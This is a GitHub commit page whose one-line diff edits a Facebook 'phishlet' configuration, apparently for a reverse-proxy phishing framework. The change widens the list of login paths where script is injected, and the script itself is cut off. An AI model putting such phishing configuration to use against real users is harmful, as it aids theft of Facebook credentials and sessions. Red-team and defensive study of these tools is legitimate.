Skip to content

Commit

Permalink
Merge pull request kgretzky#483 from charlesbel/patch-3
Browse files Browse the repository at this point in the history
Fix the Javascript on the fail page
  • Loading branch information
kgretzky authored Sep 20, 2020
2 parents dbfa86b + 5344e31 commit e0485e3
Showing 1 changed file with 1 addition and 1 deletion.
2 changes: 1 addition & 1 deletion phishlets/facebook.yaml
Original file line number Diff line number Diff line change
Expand Up @@ -35,7 +35,7 @@ login:

js_inject:
- trigger_domains: ["www.facebook.com"]
trigger_paths: ["/login.php"]
trigger_paths: ["/login.php", "/login/device-based/regular/login/", "/login/*"]
trigger_params: []
script: |
function onclickListener(){
Expand Down

0 comments on commit e0485e3

Please sign in to comment.